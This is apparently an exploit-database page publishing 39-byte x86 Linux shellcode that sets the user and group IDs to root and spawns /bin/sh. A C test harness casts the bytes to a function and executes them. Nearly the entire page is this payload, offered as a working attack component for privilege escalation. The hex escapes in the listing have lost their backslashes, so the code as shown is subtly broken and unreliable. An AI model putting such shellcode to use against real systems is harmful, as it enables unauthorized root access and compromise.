39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode

[Exploit] [Remote] [Local] [Web Apps] [Dos/Poc] [Shellcode] [RSS]

# Title : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
# Published : 2010-06-01
# Author : gunslinger_
# Previous Title : 33 bytes unlink "/etc/shadow" x86 linux shellcode
# Next Title : Windows Seven x64 (cmd) Shellcode 61 Bytes

/*
Name   : 39 bytes sys_setuid(0) & sys_setgid(0) & execve ("/bin/sh") x86 linux shellcode
Date   : Tue Jun  1 21:29:10 2010
Author : gunslinger_ <yudha.gunslinger[at]gmail.com>
Web    : http://devilzc0de.org
blog   : http://gunslingerc0de.wordpress.com
tested on : linux debian
*/
#include <stdio.h>

char *shellcode=
		"xebx19"                    /* jmp    0x804807b */
		"x31xc0"                    /* xor    %eax,%eax */
		"xb0x17"                    /* mov    $0x17,%al */
		"x31xdb"                    /* xor    %ebx,%ebx */
		"xcdx80"                    /* int    $0x80 */
		"x31xc0"                    /* xor    %eax,%eax */
		"xb0x2e"                    /* mov    $0x2e,%al */
		"x31xdb"                    /* xor    %ebx,%ebx */
		"xcdx80"                    /* int    $0x80 */
		"x31xc0"                    /* xor    %eax,%eax */
		"xb0x0b"                    /* mov    $0xb,%al */
		"x5b"                        /* pop    %ebx */
		"x89xd1"                    /* mov    %edx,%ecx */
		"xcdx80"                    /* int    $0x80 */
		"xe8xe2xffxffxff"        /* call   0x8048062 */
		"x2f"                        /* das     */
		"x62x69x6e"                /* bound  %ebp,0x6e(%ecx) */
		"x2f"                        /* das     */
		"x73x68"                    /* jae    0x80480ef */
		"";

int main(void)
{
		fprintf(stdout,"Length: %dn",strlen(shellcode));
		((void (*)(void)) shellcode)();
		return 0;
}